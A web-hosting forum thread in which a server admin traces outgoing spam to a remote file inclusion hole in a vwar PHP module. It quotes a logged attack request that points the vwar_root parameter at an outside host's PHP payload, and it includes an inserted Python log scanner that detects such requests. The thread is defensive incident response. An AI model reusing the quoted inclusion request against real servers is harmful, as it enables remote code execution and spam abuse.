spam from my server from account www-data?

Seems my server was listed on some spam filter sites. I see a lot of messages in the mailq, all starting with www-data@..... How to prevent this, what is it???

thanks
Raymond
RayIT

After some googling, something like this should be in the vhost file to know which domain is giving the problem???

php_admin_value sendmail_path "/usr/sbin/sendmail -t -i -fUSER at example.com"

Maybe for future updates of ISPCONFIG?? Are there other solutions??

Biggest problem is I can not find the website which has the bad script??!!!

example:

May 17 06:39:07 ns1 postfix/qmgr[32348]: 60A0C372868: from=<[email protected]>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6559F3728E0: from=<[email protected]>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6D48E373256: from=<[email protected]>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 66857372E3C: from=<[email protected]>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6CA233732CE: from=<[email protected]>, size=4427, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 619D9372802: from=<[email protected]>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67217372C41: from=<[email protected]>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6A6FA372831: from=<[email protected]>, size=4425, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6F496372827: from=<[email protected]>, size=4419, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 650D6372B01: from=<[email protected]>, size=4417, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 61AD43728AE: from=<[email protected]>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 627E7372D8A: from=<[email protected]>, size=4424, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 64C7237317B: from=<[email protected]>, size=4421, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 69DCD3729D5: from=<[email protected]>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 694713729E7: from=<[email protected]>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 65149372A83: from=<[email protected]>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67DEA372EF5: from=<[email protected]>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67FFC372EFA: from=<[email protected]>, size=4414, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6BEB1372EA2: from=<[email protected]>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 63935372D18: from=<[email protected]>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6B528372FF8: from=<[email protected]>, size=4423, nrcpt=1 (queue active)
Seems like someone is abusing a contact form, guestbook, etc. on one of your web sites to send spam...
Help... I can find nothing in the Apache log files. Maybe have a look? http://www.rayit.com/syslog and http://www.rayit.com/ispconfig_access_log Please have a look for me...
problem probably found

www.bob-gaming.nl||||163464||||81.199.83.160 - - [17/May/2006:10:29:27 +0200] "POST /modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt? HTTP/1.1" 200 163464 "http://www.bob-gaming.nl/modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

Seems to be the problem, I think.
I can only agree with Norman: turn the account off as soon as possible, e.g. with an .htaccess file. Your spam problem seems to be only the tip of the iceberg. The script seems to allow execution of external PHP code provided by a URL to the variable vwar_root.
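One way to find the affected site from the access logs, as an added example that is not part of the original thread: it scans vhost-prefixed log lines (the vhost||||bytes||||client format shown above) for query parameters whose value is a URL on another host, the pattern seen in the vwar_root request. The sample lines, hostnames and function names are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote

# ISPConfig-style vhost log line as shown in the thread:
# vhost||||bytes||||client - - [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<vhost>[^|\s]+)\|\|\|\|\d+\|\|\|\|(?P<client>\S+) \S+ \S+ '
    r'\[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Parameter value that is itself a URL; captures the host it points at.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://(?:[^/?#@]*@)?(?P<host>[^/?#:]+)', re.I)

def find_remote_includes(lines):
    """Yield a finding for each query parameter that carries a URL to another host."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a vhost-prefixed access log line
        path, _, query = m["target"].partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            url = REMOTE_RE.match(unquote(value))  # undo a second layer of percent-encoding
            # Assumption: same-host URLs (redirect/return parameters) are benign and skipped.
            if url and url["host"].lower() != m["vhost"].lower():
                yield {"vhost": m["vhost"], "client": m["client"], "path": path,
                       "param": name, "remote_host": url["host"].lower(),
                       "status": int(m["status"])}

def summarize(findings):
    """Count hits per (vhost, script, parameter) to point at the site to disable."""
    return Counter((f["vhost"], f["path"], f["param"]) for f in findings)

# Constructed sample lines (documentation-range IPs and .example hosts).
SAMPLE_LOG = [
    'www.site-a.example||||5120||||192.0.2.10 - - [17/May/2006:10:01:02 +0200] "GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    'www.site-b.example||||163464||||198.51.100.7 - - [17/May/2006:10:29:27 +0200] "POST /modules/vwar/admin/admin.php?vwar_root=http://files.example.net/x.txt? HTTP/1.1" 200 163464 "-" "Mozilla/4.0"',
    'www.site-b.example||||900||||198.51.100.7 - - [17/May/2006:10:30:00 +0200] "GET /modules/vwar/admin/admin.php?vwar_root=http%253A%252F%252Ffiles.example.net%252Fx.txt HTTP/1.1" 200 900 "-" "Mozilla/4.0"',
    'www.site-c.example||||300||||203.0.113.5 - - [17/May/2006:10:31:00 +0200] "GET /go.php?ref=http%3A%2F%2Fwww.site-c.example%2F HTTP/1.1" 302 300 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for (vhost, path, param), hits in summarize(find_remote_includes(SAMPLE_LOG)).most_common():
        print(f"{hits:4d}  {vhost}  {path}  param={param}")
```

A hit with status 200 and a large response size, as in the log line quoted in the thread, deserves attention first; the listed script can then be blocked while the site is cleaned up.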
Thanks. I chmod 000 the files and made user root. Hopefully, if the user will update to the newest release, the problems will be fixed. Will point the webmaster of the site to http://www.vwar.de/: various security leaks which could allow malicious users to include a (remote) file and e.g. execute PHP commands on the server hosting vwar.

thanks
Raymond
RayIT
I think I have the same problem. Sorry for the lame question, but where do I go to look at the apache log? I'm running Ubuntu.
My access log file is empty. Is there someplace special where ISPConfig keeps the apache logs? I'm trying to identify which website might be causing the problem.